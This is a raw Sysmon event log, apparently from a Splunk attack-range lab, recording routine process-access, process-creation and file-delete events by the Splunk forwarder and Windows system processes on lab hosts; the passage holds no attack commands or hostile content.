10:53:19.375{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-121F-6216-2E05-000000003802}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-121F-6216-2E05-000000003802}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.375{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-121F-6216-2E05-000000003802}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.377{C8EA50B7-121F-6216-2E05-000000003802}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7737A2FC82B03CF37314EDA39742A539,SHA256=581916D0BD5676139C22F18F4D8EB4B6BDCFD14AA220DCB09063F73406204807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:20.992{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE260D5EE68300CC197EEAAB1CA6A97,SHA256=5A8ABDF734AAE7DFC99E38830C005A7B0F8166C79D121C510947B3A5EA0630A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.791{C8EA50B7-1220-6216-3005-000000003802}10561224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1220-6216-3005-000000003802}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1220-6216-3005-000000003802}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.507{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1220-6216-3005-000000003802}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.510{C8EA50B7-1220-6216-3005-000000003802}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.360{C8EA50B7-121F-6216-2F05-000000003802}69206924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.307{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B2E9C46B4223CCEEE8BED8A9D780A3,SHA256=2D4B5C92B2D70B79F298EA9F62BAC7D853CF57DBBD5FAFA5A6F8918ABB8019B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:20.065{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-136MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:21.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3F3EC9390D2D7A1A59ABE6C7B124E6,SHA256=A3A8F10CC4DBC4483FDA71871CE2156FE0947BD88687890AA3A7E08738D33432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.323{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=385F4C56616196AF1A00A9B6E2F36497,SHA256=6CCACE445645A821C4E969E7835C71A4E4C8118F82A06E238329524871C33687,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.016{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1221-6216-3105-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.011{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.011{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.010{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1221-6216-3105-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.010{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1221-6216-3105-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 